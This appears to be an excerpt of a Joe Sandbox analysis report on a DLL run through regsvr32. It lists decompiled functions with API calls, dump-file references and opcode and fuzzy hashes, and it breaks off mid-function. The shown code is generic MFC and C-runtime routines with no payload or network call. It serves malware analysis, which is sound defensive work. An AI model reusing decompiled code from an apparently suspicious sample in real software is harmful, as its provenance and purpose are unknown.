                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Resource$FindFreeLoadLock
                                                                                                            • String ID:
                                                                                                            • API String ID: 1078018258-0
                                                                                                            • Opcode ID: 1bfed9c45fcc7c4252f354aa1b7bd718f75082ca3ca7a644671ccf1c6bb2871f
                                                                                                            • Instruction ID: fdd0e0ea882c3c69c4099ed456d0cfd7dce8bbf4e7d741b6fad66cb09ea4bd77
                                                                                                            • Opcode Fuzzy Hash: 1bfed9c45fcc7c4252f354aa1b7bd718f75082ca3ca7a644671ccf1c6bb2871f
                                                                                                            • Instruction Fuzzy Hash: 40F0903A2412256FD3029FA65C88D3FB6FDEFB59E6B424038FD05D6212DE209C5587A1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 82%
                                                                                                            			E1002095F(void* __ecx) {
                                                                                                            				int _t26;
                                                                                                            				int _t28;
                                                                                                            				void* _t41;
                                                                                                            
                                                                                                            				E10011BF0(0x1003a4d8, _t41);
                                                                                                            				_push(__ecx);
                                                                                                            				if( *((intOrPtr*)(__ecx + 0x4c)) != 0) {
                                                                                                            					 *(_t41 - 0x10) =  *((intOrPtr*)( *((intOrPtr*)(E100243B2())) + 0xc))() + 0x10;
                                                                                                            					 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
                                                                                                            					_push(_t41 - 0x10);
                                                                                                            					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x4c)))) + 0x8c))();
                                                                                                            					lstrcpynA( *(_t41 + 8),  *(_t41 - 0x10),  *(_t41 + 0xc));
                                                                                                            					_t26 = lstrlenA( *(_t41 + 8));
                                                                                                            					E100014B0( &(( *(_t41 - 0x10))[0xfffffffffffffff0]), _t41 - 0x10);
                                                                                                            					_t28 = _t26;
                                                                                                            				} else {
                                                                                                            					_t28 = GetWindowTextA( *(__ecx + 0x1c),  *(_t41 + 8),  *(_t41 + 0xc));
                                                                                                            				}
                                                                                                            				 *[fs:0x0] =  *((intOrPtr*)(_t41 - 0xc));
                                                                                                            				return _t28;
                                                                                                            			}







                                                                                                            APIs
                                                                                                            • __EH_prolog.LIBCMT ref: 10020964
                                                                                                            • GetWindowTextA.USER32 ref: 1002097C
                                                                                                            • lstrcpynA.KERNEL32(?,?,?,?,?,1002CC3A,?,00000104,?), ref: 100209B2
                                                                                                            • lstrlenA.KERNEL32(?,?,?,1002CC3A,?,00000104,?), ref: 100209BB
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: H_prologTextWindowlstrcpynlstrlen
                                                                                                            • String ID:
                                                                                                            • API String ID: 3022380644-0
                                                                                                            • Opcode ID: 85d23a542434996f255d9aee2352e9f09da7a367e08aff553ccb44c9efc23bd1
                                                                                                            • Instruction ID: 9a5806592f70ea17751b7fdaa6094fb832eb62a9ddc39452fd7da2019fb28030
                                                                                                            • Opcode Fuzzy Hash: 85d23a542434996f255d9aee2352e9f09da7a367e08aff553ccb44c9efc23bd1
                                                                                                            • Instruction Fuzzy Hash: 75019E36900129EFDB05DFA4CC48BAEBBB2FF48314F00C619F512AB262CB719950DB90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 100%
                                                                                                            			E1001B66F(void* __eflags, intOrPtr* _a4, intOrPtr* _a8) {
                                                                                                            				void* _t12;
                                                                                                            				void* _t18;
                                                                                                            				intOrPtr* _t20;
                                                                                                            				void* _t21;
                                                                                                            				void* _t22;
                                                                                                            
                                                                                                            				_t20 = _a4;
                                                                                                            				_t19 = _a8;
                                                                                                            				_t12 = E1001B64E( *_t20,  *_a8, _t20);
                                                                                                            				_t22 = _t21 + 0xc;
                                                                                                            				if(_t12 != 0) {
                                                                                                            					_t3 = _t20 + 4; // 0x4
                                                                                                            					_t18 = E1001B64E( *_t3, 1, _t3);
                                                                                                            					_t22 = _t22 + 0xc;
                                                                                                            					if(_t18 != 0) {
                                                                                                            						 *((intOrPtr*)(_t20 + 8)) =  *((intOrPtr*)(_t20 + 8)) + 1;
                                                                                                            					}
                                                                                                            				}
                                                                                                            				_t6 = _t20 + 4; // 0x4
                                                                                                            				if(E1001B64E( *_t6,  *((intOrPtr*)(_t19 + 4)), _t6) != 0) {
                                                                                                            					 *((intOrPtr*)(_t20 + 8)) =  *((intOrPtr*)(_t20 + 8)) + 1;
                                                                                                            				}
                                                                                                            				_t10 = _t20 + 8; // 0x8
                                                                                                            				return E1001B64E( *_t10,  *((intOrPtr*)(_t19 + 8)), _t10);
                                                                                                            			}









                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ___addl
                                                                                                            • String ID:
                                                                                                            • API String ID: 2260456530-0
                                                                                                            • Opcode ID: 0010489af6f0204a76aa343dff914e49e539203f3853c838d62e7c6bfc1b52c0
                                                                                                            • Instruction ID: 1cba6355bd62d8335d9ad848ad702df172e9c7a68b0d5ea6ff045fc298979a71
                                                                                                            • Opcode Fuzzy Hash: 0010489af6f0204a76aa343dff914e49e539203f3853c838d62e7c6bfc1b52c0
                                                                                                            • Instruction Fuzzy Hash: 37F06D7A800A02EFDA548B52DC02EA6B7E9FF65240B004425FD598A031EB32E8A9CB51
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 100%
                                                                                                            			E10029B23(void* __esi, struct HWND__* _a4, CHAR* _a8) {
                                                                                                            				intOrPtr _v8;
                                                                                                            				char _v264;
                                                                                                            				intOrPtr _t10;
                                                                                                            				int _t20;
                                                                                                            
                                                                                                            				_t10 =  *0x1004c470; // 0xf3933a06
                                                                                                            				_v8 = _t10;
                                                                                                            				_t20 = lstrlenA(_a8);
                                                                                                            				if(_t20 > 0x100 || GetWindowTextA(_a4,  &_v264, 0x100) != _t20 || lstrcmpA( &_v264, _a8) != 0) {
                                                                                                            					_t13 = SetWindowTextA(_a4, _a8);
                                                                                                            				}
                                                                                                            				return E100117AE(_t13, _v8);
                                                                                                            			}








                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: TextWindow$lstrcmplstrlen
                                                                                                            • String ID:
                                                                                                            • API String ID: 330964273-0
                                                                                                            • Opcode ID: 49ff855ffa8cc10cf004c62dcee453a07d27d3b0eafd92cf3458448ca621e64d
                                                                                                            • Instruction ID: 93620f556a2fd5ec9caf7d88bc5fd11bb860ddfd3ca1ea698490334ddcd31a8c
                                                                                                            • Opcode Fuzzy Hash: 49ff855ffa8cc10cf004c62dcee453a07d27d3b0eafd92cf3458448ca621e64d
                                                                                                            • Instruction Fuzzy Hash: 42F04F7690002CAFDF129FA0DD84DDDBBB9EB04380F008111F946DA120D730DE908B50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 100%
                                                                                                            			E100308EB(void* __ecx, void* __eflags) {
                                                                                                            				signed int _t8;
                                                                                                            				int _t9;
                                                                                                            				void* _t11;
                                                                                                            				void* _t12;
                                                                                                            				signed int* _t13;
                                                                                                            				void* _t14;
                                                                                                            
                                                                                                            				_t12 = __ecx;
                                                                                                            				E10030582(__ecx, __eflags, 1);
                                                                                                            				ReleaseCapture();
                                                                                                            				_t11 = E100220EE(_t14, GetDesktopWindow());
                                                                                                            				LockWindowUpdate(0);
                                                                                                            				_t13 = _t12 + 0x84;
                                                                                                            				_t8 =  *_t13;
                                                                                                            				if(_t8 != 0) {
                                                                                                            					_t9 = ReleaseDC( *(_t11 + 0x1c),  *(_t8 + 4));
                                                                                                            					 *_t13 =  *_t13 & 0x00000000;
                                                                                                            					return _t9;
                                                                                                            				}
                                                                                                            				return _t8;
                                                                                                            			}

                                                                                                            APIs
                                                                                                              • Part of subcall function 10030582: GetStockObject.GDI32(00000000), ref: 10030598
                                                                                                              • Part of subcall function 10030582: InflateRect.USER32(?,000000FF,000000FF), ref: 1003062D
                                                                                                            • ReleaseCapture.USER32(?,?,1003093E), ref: 100308F6
                                                                                                            • GetDesktopWindow.USER32 ref: 100308FC
                                                                                                            • LockWindowUpdate.USER32(00000000,00000000,?,?,1003093E), ref: 1003090C
                                                                                                            • ReleaseDC.USER32 ref: 10030924
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ReleaseWindow$CaptureDesktopInflateLockObjectRectStockUpdate
                                                                                                            • String ID:
                                                                                                            • API String ID: 1260764132-0
                                                                                                            • Opcode ID: d5f880df9b7f123afe39f0741efa6f586c3ee5538d0bb60a1943d3de393b2b3c
                                                                                                            • Instruction ID: cc833fa3e0bd0d4d25e579e7f05375a90551c712b7101b0f89079a167d1ea1eb
                                                                                                            • Opcode Fuzzy Hash: d5f880df9b7f123afe39f0741efa6f586c3ee5538d0bb60a1943d3de393b2b3c
                                                                                                            • Instruction Fuzzy Hash: F2E04837500224AFE7225F65DD5DF457A64EF40752F158424F541DE0A3CA75D8D1CB50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 65%
                                                                                                            			E100128A7(void* __ebx, void* __edi, void* __esi) {
                                                                                                            				intOrPtr _v8;
                                                                                                            				char _v21;
                                                                                                            				signed char _v22;
                                                                                                            				struct _cpinfo _v28;
                                                                                                            				char _v284;
                                                                                                            				char _v540;
                                                                                                            				char _v796;
                                                                                                            				char _v1308;
                                                                                                            				void* __ebp;
                                                                                                            				intOrPtr _t42;
                                                                                                            				signed int _t45;
                                                                                                            				char _t47;
                                                                                                            				signed char _t48;
                                                                                                            				signed int _t58;
                                                                                                            				signed int _t59;
                                                                                                            				signed int _t65;
                                                                                                            				signed int _t68;
                                                                                                            				signed char _t70;
                                                                                                            				char _t71;
                                                                                                            				signed int _t73;
                                                                                                            				signed int _t74;
                                                                                                            				signed char* _t78;
                                                                                                            				signed char* _t79;
                                                                                                            				void* _t81;
                                                                                                            				void* _t86;
                                                                                                            				void* _t87;
                                                                                                            
                                                                                                            				_t80 = __edi;
                                                                                                            				_t63 = __ebx;
                                                                                                            				_t42 =  *0x1004c470; // 0xf3933a06
                                                                                                            				_v8 = _t42;
                                                                                                            				if(GetCPInfo( *0x10050b84,  &_v28) != 1) {
                                                                                                            					_t45 = 0;
                                                                                                            					__eflags = 0;
                                                                                                            					do {
                                                                                                            						__eflags = _t45 - 0x41;
                                                                                                            						if(_t45 < 0x41) {
                                                                                                            							L23:
                                                                                                            							__eflags = _t45 - 0x61;
                                                                                                            							if(_t45 < 0x61) {
                                                                                                            								L26:
                                                                                                            								 *(_t45 + 0x10050ba0) = 0;
                                                                                                            							} else {
                                                                                                            								__eflags = _t45 - 0x7a;
                                                                                                            								if(_t45 > 0x7a) {
                                                                                                            									goto L26;
                                                                                                            								} else {
                                                                                                            									 *(_t45 + 0x10050a81) =  *(_t45 + 0x10050a81) | 0x00000020;
                                                                                                            									_t68 = _t45 - 0x20;
                                                                                                            									goto L22;
                                                                                                            								}
                                                                                                            							}
                                                                                                            						} else {
                                                                                                            							__eflags = _t45 - 0x5a;
                                                                                                            							if(_t45 > 0x5a) {
                                                                                                            								goto L23;
                                                                                                            							} else {
                                                                                                            								 *(_t45 + 0x10050a81) =  *(_t45 + 0x10050a81) | 0x00000010;
                                                                                                            								_t68 = _t45 + 0x20;
                                                                                                            								__eflags = _t68;
                                                                                                            								L22:
                                                                                                            								 *(_t45 + 0x10050ba0) = _t68;
                                                                                                            							}
                                                                                                            						}
                                                                                                            						_t45 = _t45 + 1;
                                                                                                            						__eflags = _t45 - 0x100;
                                                                                                            					} while (_t45 < 0x100);
                                                                                                            				} else {
                                                                                                            					_t47 = 0;
                                                                                                            					do {
                                                                                                            						 *((char*)(_t86 + _t47 - 0x118)) = _t47;
                                                                                                            						_t47 = _t47 + 1;
                                                                                                            					} while (_t47 < 0x100);
                                                                                                            					_t48 = _v22;
                                                                                                            					_v284 = 0x20;
                                                                                                            					if(_t48 != 0) {
                                                                                                            						_push(__ebx);
                                                                                                            						_t78 =  &_v21;
                                                                                                            						_push(__edi);
                                                                                                            						do {
                                                                                                            							_t65 =  *_t78 & 0x000000ff;
                                                                                                            							_t59 = _t48 & 0x000000ff;
                                                                                                            							if(_t59 <= _t65) {
                                                                                                            								_t73 = _t65 - _t59 + 1;
                                                                                                            								_t74 = _t73 >> 2;
                                                                                                            								_t81 = _t86 + _t59 - 0x118;
                                                                                                            								memset(_t81 + _t74, memset(_t81, 0x20202020, _t74 << 2), (_t73 & 0x00000003) << 0);
                                                                                                            								_t87 = _t87 + 0x18;
                                                                                                            								_t65 = 0;
                                                                                                            							}
                                                                                                            							_t79 =  &(_t78[1]);
                                                                                                            							_t48 =  *_t79;
                                                                                                            							_t78 =  &(_t79[1]);
                                                                                                            							_t96 = _t48;
                                                                                                            						} while (_t48 != 0);
                                                                                                            						_pop(_t80);
                                                                                                            						_pop(_t63);
                                                                                                            					}
                                                                                                            					_push(0);
                                                                                                            					_push( *0x10050a68);
                                                                                                            					_push( *0x10050b84);
                                                                                                            					_push( &_v1308);
                                                                                                            					_push(0x100);
                                                                                                            					_push( &_v284);
                                                                                                            					_push(1);
                                                                                                            					E1001843D(_t63, _t65, _t80, 0x100, _t96);
                                                                                                            					_push(0);
                                                                                                            					_push( *0x10050b84);
                                                                                                            					_push(0x100);
                                                                                                            					_push( &_v540);
                                                                                                            					_push(0x100);
                                                                                                            					_push( &_v284);
                                                                                                            					_push(0x100);
                                                                                                            					_push( *0x10050a68);
                                                                                                            					E10018081(_t63, _t80, 0x100, _t96);
                                                                                                            					_push(0);
                                                                                                            					_push( *0x10050b84);
                                                                                                            					_push(0x100);
                                                                                                            					_push( &_v796);
                                                                                                            					_push(0x100);
                                                                                                            					_push( &_v284);
                                                                                                            					_push(0x200);
                                                                                                            					_push( *0x10050a68);
                                                                                                            					E10018081(_t63, _t80, 0x100, _t96);
                                                                                                            					_t58 = 0;
                                                                                                            					do {
                                                                                                            						_t70 =  *((intOrPtr*)(_t86 + _t58 * 2 - 0x518));
                                                                                                            						if((_t70 & 0x00000001) == 0) {
                                                                                                            							__eflags = _t70 & 0x00000002;
                                                                                                            							if((_t70 & 0x00000002) == 0) {
                                                                                                            								 *((char*)(_t58 + 0x10050ba0)) = 0;
                                                                                                            							} else {
                                                                                                            								 *(_t58 + 0x10050a81) =  *(_t58 + 0x10050a81) | 0x00000020;
                                                                                                            								_t71 =  *((intOrPtr*)(_t86 + _t58 - 0x318));
                                                                                                            								goto L12;
                                                                                                            							}
                                                                                                            						} else {
                                                                                                            							 *(_t58 + 0x10050a81) =  *(_t58 + 0x10050a81) | 0x00000010;
                                                                                                            							_t71 =  *((intOrPtr*)(_t86 + _t58 - 0x218));
                                                                                                            							L12:
                                                                                                            							 *((char*)(_t58 + 0x10050ba0)) = _t71;
                                                                                                            						}
                                                                                                            						_t58 = _t58 + 1;
                                                                                                            					} while (_t58 < 0x100);
                                                                                                            				}
                                                                                                            				return E100117AE(_t45, _v8);
                                                                                                            			}
                                                                                                            0x100128d9
                                                                                                            0x100128d9
                                                                                                            0x100128e0
                                                                                                            0x100128e1
                                                                                                            0x100128e5
                                                                                                            0x100128ea
                                                                                                            0x100128f1
                                                                                                            0x100128f3
                                                                                                            0x100128f4
                                                                                                            0x100128f7
                                                                                                            0x100128f8
                                                                                                            0x100128f8
                                                                                                            0x100128fb
                                                                                                            0x10012900
                                                                                                            0x10012904
                                                                                                            0x10012907
                                                                                                            0x1001290a
                                                                                                            0x1001291d
                                                                                                            0x1001291d
                                                                                                            0x1001291d
                                                                                                            0x1001291d
                                                                                                            0x1001291f
                                                                                                            0x10012920
                                                                                                            0x10012922
                                                                                                            0x10012923
                                                                                                            0x10012923
                                                                                                            0x10012927
                                                                                                            0x10012928
                                                                                                            0x10012928
                                                                                                            0x10012929
                                                                                                            0x1001292b
                                                                                                            0x10012937
                                                                                                            0x1001293d
                                                                                                            0x1001293e
                                                                                                            0x10012945
                                                                                                            0x10012946
                                                                                                            0x10012948
                                                                                                            0x1001294d
                                                                                                            0x1001294f
                                                                                                            0x1001295b
                                                                                                            0x1001295c
                                                                                                            0x1001295d
                                                                                                            0x10012964
                                                                                                            0x10012965
                                                                                                            0x10012966
                                                                                                            0x1001296c
                                                                                                            0x10012971
                                                                                                            0x10012973
                                                                                                            0x1001297f
                                                                                                            0x10012980
                                                                                                            0x10012981
                                                                                                            0x10012988
                                                                                                            0x10012989
                                                                                                            0x1001298e
                                                                                                            0x10012994
                                                                                                            0x1001299c
                                                                                                            0x1001299e
                                                                                                            0x1001299e
                                                                                                            0x100129a9
                                                                                                            0x100129c1
                                                                                                            0x100129c4
                                                                                                            0x100129d6
                                                                                                            0x100129c6
                                                                                                            0x100129c6
                                                                                                            0x100129cd
                                                                                                            0x00000000
                                                                                                            0x100129cd
                                                                                                            0x100129ab
                                                                                                            0x100129ab
                                                                                                            0x100129b2
                                                                                                            0x100129b9
                                                                                                            0x100129b9
                                                                                                            0x100129b9
                                                                                                            0x100129dd
                                                                                                            0x100129de
                                                                                                            0x100129e2
                                                                                                            0x10012a32

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Info
                                                                                                            • String ID: $
                                                                                                            • API String ID: 1807457897-3032137957
                                                                                                            • Opcode ID: e1feaf72be715a4ff1946e31e99b5ac143a73204088819c920269db308c45d83
                                                                                                            • Instruction ID: 0aa4f3d34f00a4262c94cc47b2ead2c87a4a0533aa2425fc92cd258cd4020972
                                                                                                            • Opcode Fuzzy Hash: e1feaf72be715a4ff1946e31e99b5ac143a73204088819c920269db308c45d83
                                                                                                            • Instruction Fuzzy Hash: 304106B15043AC9FEB55CA68CC95BEE7BA8EF05304F2044E1E981DB162C7708AD5D791
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 78%
                                                                                                            			E10021810(void* __ecx, int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                            				struct _WNDCLASSA _v44;
                                                                                                            				void* __ebx;
                                                                                                            				void* __ebp;
                                                                                                            				void* _t25;
                                                                                                            				intOrPtr _t37;
                                                                                                            				void* _t38;
                                                                                                            				struct HINSTANCE__* _t41;
                                                                                                            				CHAR* _t43;
                                                                                                            
                                                                                                            				_t38 = __ecx;
                                                                                                            				_t43 = E100373A5() + 0x7c;
                                                                                                            				_t25 = E100373B5();
                                                                                                            				_t37 = _a8;
                                                                                                            				_t41 =  *(_t25 + 8);
                                                                                                            				if(_t37 != 0 || _a12 != _t37) {
                                                                                                            					L4:
                                                                                                            					_push(_a16);
                                                                                                            					_push(_a12);
                                                                                                            					_push(_t37);
                                                                                                            					_push(_a4);
                                                                                                            					E10012068(_t37, _t38, __eflags, _t43, "Afx:%p:%x:%p:%p:%p", _t41);
                                                                                                            					goto L5;
                                                                                                            				} else {
                                                                                                            					_t49 = _a16 - _t37;
                                                                                                            					if(_a16 != _t37) {
                                                                                                            						goto L4;
                                                                                                            					}
                                                                                                            					_push(_a4);
                                                                                                            					E10012068(_t37, _t38, _t49, _t43, "Afx:%p:%x", _t41);
                                                                                                            					L5:
                                                                                                            					if(GetClassInfoA(_t41, _t43,  &_v44) == 0) {
                                                                                                            						_v44.style = _a4;
                                                                                                            						_v44.lpfnWndProc = DefWindowProcA;
                                                                                                            						_v44.cbWndExtra = 0;
                                                                                                            						_v44.cbClsExtra = 0;
                                                                                                            						_v44.lpszMenuName = 0;
                                                                                                            						_v44.hIcon = _a16;
                                                                                                            						_t40 = _a12;
                                                                                                            						_push( &_v44);
                                                                                                            						_v44.hInstance = _t41;
                                                                                                            						_v44.hCursor = _t37;
                                                                                                            						_v44.hbrBackground = _a12;
                                                                                                            						_v44.lpszClassName = _t43;
                                                                                                            						if(E10020B9B() == 0) {
                                                                                                            							E10028C0C(_t40);
                                                                                                            						}
                                                                                                            					}
                                                                                                            					return _t43;
                                                                                                            				}
                                                                                                            			}












                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ClassInfo
                                                                                                            • String ID: Afx:%p:%x$Afx:%p:%x:%p:%p:%p
                                                                                                            • API String ID: 3534257612-2801496823
                                                                                                            • Opcode ID: bac3525874c531d32c2609508dd072fba15194ad53eac21eeb6b2515cb8fd036
                                                                                                            • Instruction ID: 52b857fe777198d334fd01ba6041a527614e5ef36dd32a96c670ed063e64d698
                                                                                                            • Opcode Fuzzy Hash: bac3525874c531d32c2609508dd072fba15194ad53eac21eeb6b2515cb8fd036
                                                                                                            • Instruction Fuzzy Hash: 77214DB5D00259AFDB01DFA5D8819DEBBF8FF58290F41402AF908E7201E7309A50CBA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 95%
                                                                                                            			E100165C9() {
                                                                                                            				signed int _v8;
                                                                                                            				char _v12;
                                                                                                            				void* __ecx;
                                                                                                            				void* __esi;
                                                                                                            				CHAR* _t10;
                                                                                                            				signed int _t16;
                                                                                                            				signed int _t22;
                                                                                                            				CHAR* _t25;
                                                                                                            				signed int _t34;
                                                                                                            				intOrPtr _t45;
                                                                                                            
                                                                                                            				_push(_t27);
                                                                                                            				_t45 =  *0x10050cac; // 0x1
                                                                                                            				if(_t45 == 0) {
                                                                                                            					E10012D82();
                                                                                                            				}
                                                                                                            				 *0x1004f6fc = 0;
                                                                                                            				GetModuleFileNameA(0, 0x1004f5f8, 0x104);
                                                                                                            				_t10 =  *0x10050cb0; // 0x6b33d8
                                                                                                            				 *0x1004f410 = 0x1004f5f8;
                                                                                                            				if(_t10 == 0) {
                                                                                                            					L4:
                                                                                                            					_t25 = 0x1004f5f8;
                                                                                                            				} else {
                                                                                                            					_t25 = _t10;
                                                                                                            					if( *_t10 == 0) {
                                                                                                            						goto L4;
                                                                                                            					}
                                                                                                            				}
                                                                                                            				E1001645D(_t25, 0,  &_v12, 0,  &_v8);
                                                                                                            				_t40 = _v8 << 2;
                                                                                                            				_t16 = E100107B6(_v12 + (_v8 << 2));
                                                                                                            				_t34 = _t16;
                                                                                                            				if(_t34 != 0) {
                                                                                                            					E1001645D(_t25, _t40 + _t34,  &_v12, _t34,  &_v8);
                                                                                                            					 *0x1004f3f4 = _v8 - 1;
                                                                                                            					 *0x1004f3f8 = _t34;
                                                                                                            					_t22 = 0;
                                                                                                            				} else {
                                                                                                            					_t22 = _t16 | 0xffffffff;
                                                                                                            				}
                                                                                                            				return _t22;
                                                                                                            			}














                                                                                                            APIs
                                                                                                            • ___initmbctable.LIBCMT ref: 100165DB
                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\SysWOW64\regsvr32.exe,00000104,00000000,?,?,?,?,?,1001125B,?,?,?,10011379,?,?), ref: 100165F3
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileModuleName___initmbctable
                                                                                                            • String ID: C:\Windows\SysWOW64\regsvr32.exe
                                                                                                            • API String ID: 767393020-3922119987
                                                                                                            • Opcode ID: 0838e9af58f791c0da82764b77dea048edf17fc93264d08f26370cd1291f3d76
                                                                                                            • Instruction ID: 1de5955471f92093fdaebd9574c573a93ec7bfc48d4baa4f39bbab7b9738bcfe
                                                                                                            • Opcode Fuzzy Hash: 0838e9af58f791c0da82764b77dea048edf17fc93264d08f26370cd1291f3d76
                                                                                                            • Instruction Fuzzy Hash: 3F110AB6A04224AFD700CF99DC8599F7BE8EB4A360F21016DF915D7240EA70EE80CB60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 93%
                                                                                                            			E1001B190(void* __ecx, void* __eflags, signed int _a4, long _a8, long _a12, long _a16) {
                                                                                                            				long _v8;
                                                                                                            				long _v12;
                                                                                                            				void* _t21;
                                                                                                            				long _t22;
                                                                                                            				long _t27;
                                                                                                            				signed int _t38;
                                                                                                            				signed int _t39;
                                                                                                            				signed int _t42;
                                                                                                            
